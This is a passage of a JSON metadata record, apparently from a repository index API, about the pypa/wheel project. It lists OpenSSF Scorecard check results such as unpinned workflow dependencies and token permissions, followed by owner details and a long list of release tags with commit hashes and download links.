patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:50: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:52: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:56: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:31: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/publish.yml:23","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:41","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:43","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:46","Info:   0 out of   7 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned","Info:   0 out of   4 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Maintained","score":1,"reason":"1 commit(s) and 1 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Code-Review","score":2,"reason":"Found 8/27 approved changesets -- score normalized to 2","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/publish.yml:48","Warn: no topLevel permission defined: .github/workflows/publish.yml:1","Warn: no topLevel permission defined: .github/workflows/test.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.txt:0","Info: FSF or OSI recognized license: MIT License: LICENSE.txt:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/publish.yml:31"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Security-Policy","score":0,"reason":"security policy file not detected","details":["Warn: no security policy file detected","Warn: no security file to analyze","Warn: no security file to analyze","Warn: no security file to analyze"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":5,"reason":"SAST tool is not run on all commits -- score normalized to 5","details":["Warn: 6 commits out of 12 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-22T20:33:25.724Z","repository_id":23174547,"created_at":"2025-08-22T20:33:25.724Z","updated_at":"2025-08-22T20:33:25.724Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":281742688,"owners_count":26553720,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-30T02:00:06.501Z","response_time":61,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"pypa","name":"Python Packaging Authority","uuid":"647025","kind":"organization","description":"","email":"info@pypa.io","website":"https://www.pypa.io","location":"United States of America","twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/647025?v=4","repositories_count":58,"last_synced_at":"2025-10-30T00:34:30.821Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/pypa","funding_links":["https://github.com/sponsors/pypa"],"total_stars":88807,"followers":2132,"following":0,"created_at":"2022-11-02T16:21:37.826Z","updated_at":"2025-10-30T00:34:30.821Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa/repositories"},"tags":[{"name":"0.46.1","sha":"7a0ea7f7c3dd73747e37368bb074cd0d9fb49259","kind":"commit","published_at":"2025-04-08T20:53:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.46.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.1/manifests"},{"name":"0.46.0","sha":"1da658384bbfc14c091085bb98828e68368a1ed5","kind":"commit","published_at":"2025-04-03T09:39:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.46.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.0/manifests"},{"name":"0.45.1","sha":"7855525de4093257e7bfb434877265e227356566","kind":"commit","published_at":"2024-11-23T00:14:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.45.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.1/manifests"},{"name":"0.45.0","sha":"d78f0e372199f8294556345d867af4d3cf118418","kind":"commit","published_at":"2024-11-08T21:40:06.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.45.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.0/manifests"},{"name":"0.44.0","sha":"7bb46d7727e6e89fe56b3c78297b3af2672bbbe2","kind":"commit","published_at":"2024-08-04T14:48:22.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.44.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.44.0/manifests"},{"name":"0.43.0","sha":"fa33dfd01fd665c1fd90097563b34bce4b5527ef","kind":"commit","published_at":"2024-03-11T19:28:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.43.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.43.0/manifests"},{"name":"0.42.0","sha":"63a09bb3d92630c1d35f4fcc6f79250256aeeb5c","kind":"commit","published_at":"2023-11-26T14:35:45.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.42.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.42.0/manifests"},{"name":"0.41.3","sha":"a899f1c69ffddf564b904a5de974457c213dc36a","kind":"commit","published_at":"2023-10-30T10:04:00.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.3/manifests"},{"name":"0.41.2","sha":"e76040b0d970a0fe6211c31888fc929078ba02d9","kind":"commit","published_at":"2023-08-22T09:29:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.2/manifests"},{"name":"0.41.1","sha":"b626a4a2ee6a887c7ad4b984fcb4d465dbfa337d","kind":"commit","published_at":"2023-08-05T13:31:27.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.1/manifests"},{"name":"0.41.0","sha":"95c2d83cde174ed3c34d5a5b53dc3b3a1ace91b6","kind":"commit","published_at":"2023-07-22T10:59:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.0/manifests"},{"name":"0.40.0","sha":"461f7a3a2d4824009ca4855b3300d61e6d405dc4","kind":"commit","published_at":"2023-03-14T14:38:44.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.40.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.40.0/manifests"},{"name":"0.38.4","sha":"814c2efe8e40051039c5a6de6945e04ecdd162ee","kind":"commit","published_at":"2022-11-09T20:33:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.4/manifests"},{"name":"0.38.3","sha":"daeb157c8207b1459fc7baa5f234c165a7a5faf4","kind":"commit","published_at":"2022-11-08T17:46:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.3/manifests"},{"name":"0.38.2","sha":"44193907eb308930de05deed863fb4d157c5c866","kind":"commit","published_at":"2022-11-05T12:52:57.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.2/manifests"},{"name":"0.38.1","sha":"6f1608dc1a88f00d2390b9044bd655753f39234c","kind":"commit","published_at":"2022-11-04T09:09:25.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.1/manifests"},{"name":"0.38.0","sha":"fcb94cd51f7dfd40d88dff37415750d9e3638d3b","kind":"commit","published_at":"2022-10-20T21:19:31.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.0/manifests"},{"name":"0.37.1","sha":"c716c87ffa528ac9a31de3ed3217058848dc2cd2","kind":"commit","published_at":"2021-12-22T12:19:07.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.37.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.1/manifests"},{"name":"0.37.0","sha":"b8c4aa055cea0132776e7e53edce3538710d5b68","kind":"commit","published_at":"2021-08-09T20:44:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.37.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.0/manifests"},{"name":"0.36.2","sha":"4fb47f98550f3f43fc0b8c73f518592124ae21bd","kind":"commit","published_at":"2020-12-13T18:07:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.2/manifests"},{"name":"0.36.1","sha":"64550e15fdbc96d5690dc872257edc859c218068","kind":"commit","published_at":"2020-12-04T14:00:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.1/manifests"},{"name":"0.36.0","sha":"39b6397ba944d82f1fe37d043382f97b78a919d6","kind":"commit","published_at":"2020-12-01T08:52:46.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.0/manifests"},{"name":"0.35.1","sha":"bbc60829bea2eb25ccd236b9c6c16c9ee4f0d2ef","kind":"commit","published_at":"2020-08-14T19:22:54.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.35.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.1/manifests"},{"name":"0.35.0","sha":"4253bbb865823101d1a1757d12239fc74f49c4e7","kind":"commit","published_at":"2020-08-13T21:08:53.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.35.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.0/manifests"},{"name":"0.34.2","sha":"0036f80513457a95a309c81d8a63f113b52dbafa","kind":"commit","published_at":"2020-01-30T22:20:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.2/manifests"},{"name":"0.34.1","sha":"43078c409ebe9b7d5d70c2476fcb82055e8f0b97","kind":"tag","published_at":"2020-01-27T20:20:14.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.1/manifests"},{"name":"0.34.0","sha":"8b2312799f46359ac78f3b011dc758c45518e9e1","kind":"commit","published_at":"2020-01-27T08:21:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.0/manifests"},{"name":"0.33.6","sha":"b227ddd5beaba49294017d061d501f6d433393b0","kind":"commit","published_at":"2019-08-18T09:55:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.6/manifests"},{"name":"0.33.5","sha":"9ee9726620f80232ca49991dbeef83963d94482a","kind":"commit","published_at":"2019-08-17T16:13:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.5","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.5/manifests"},{"name":"0.33.4","sha":"882cd05d9bf4c4fc72568d806e227b5cf14df1d7","kind":"commit","published_at":"2019-05-11T21:41:35.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.4/manifests"},{"name":"0.33.3","sha":"7b782219d5322ee66cef293c5c5b49fbd4133a0d","kind":"commit","published_at":"2019-05-10T11:06:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.3/manifests"},{"name":"0.33.2","sha":"9534258081b4abf3af817dab976bc95ecc4bfa30","kind":"commit","published_at":"2019-05-09T08:18:30.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.2/manifests"},{"name":"0.33.1","sha":"c15924d80ed2235f277569d99bb9d80f59c9b19d","kind":"commit","published_at":"2019-02-19T14:03:57.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.1/manifests"},{"name":"0.33.0","sha":"bb54233a2dc855951fa40a48d5730c67f9d570c8","kind":"commit","published_at":"2019-02-12T06:58:33.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.0/manifests"},{"name":"0.32.3","sha":"11584b78a56b4eedba4eedc55c9dac8aa2dd7070","kind":"commit","published_at":"2018-11-19T00:16:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.3/manifests"},{"name":"0.32.2","sha":"3d3708c659f7b9988f958539e7748a1a01ee6e77","kind":"commit","published_at":"2018-10-20T20:03:14.000Z","download_url":"https://codeload.github.